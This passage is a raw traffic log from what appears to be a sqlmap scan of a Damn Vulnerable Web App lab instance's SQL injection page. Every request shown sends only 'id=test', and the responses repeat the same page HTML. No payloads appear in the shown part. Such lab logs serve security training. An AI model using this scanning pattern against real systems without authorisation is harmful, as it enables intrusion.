no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:54 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#5]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#5] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#6]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#6] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#7]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#7] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#8]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#8] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#9]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#9] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class=""><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class="selected"><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul> </div> </div> <div id="main_body"> <div class="body_padded"> <h1>Vulnerability: SQL Injection</h1> <div class="vulnerable_code_area"> <h3>User ID:</h3> <form action="#" method="GET"> <input type="text" name="id"> <input type="submit" name="Submit" value="Submit"> </form> </div> <h2>More info</h2> <ul> <li><a href="http://hiderefer.com/?http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/securityreviews/5DP0N1P76E.html</a></li> <li><a href="http://hiderefer.com/?http://en.wikipedia.org/wiki/SQL_injection" target="_blank">http://en.wikipedia.org/wiki/SQL_injection</a></li> <li><a href="http://hiderefer.com/?http://www.unixwiz.net/techtips/sql-injection.html" target="_blank">http://www.unixwiz.net/techtips/sql-injection.html</a></li> </ul> </div> <br /> <br /> </div> <div class="clear"> </div> <div id="system_info"> <input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=sqli&security=low' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=sqli&security=low' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> low<br /><b>PHPIDS:</b> disabled</div> </div> <div id="footer"> <p>Damn Vulnerable Web Application (DVWA) v1.0.7</p> </div> </div> </body> </html> ############################################################################ HTTP request [#10]: GET /vulnerabilities/sqli/?id=test&Submit=Submit HTTP/1.1 Accept-Encoding: identity Accept-language: en-us,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev (r4372) (http://www.sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 172.16.171.134 Cookie: PHPSESSID=77tko7r0oi19i2ndst212lq4l0; security=low Pragma: no-cache Cache-control: no-cache,no-store Connection: close HTTP response [#10] (200 OK): Content-length: 4333 X-powered-by: PHP/5.3.1 Expires: Tue, 23 Jun 2009 12:00:00 GMT Uri: http://172.16.171.134:80/vulnerabilities/sqli/?id=test&Submit=Submit Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Connection: close Pragma: no-cache Cache-control: no-cache, must-revalidate Date: Fri, 02 Sep 2011 00:47:55 GMT Content-type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: SQL Injection</title> <link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /> <link rel="icon" type="\image/ico" href="../../favicon.ico" /> <script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script> </head> <body class="home"> <div id="container"> <div id="header"> <img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /> </div> <div id="main_menu"> <div id="main_menu_padded"> <ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li 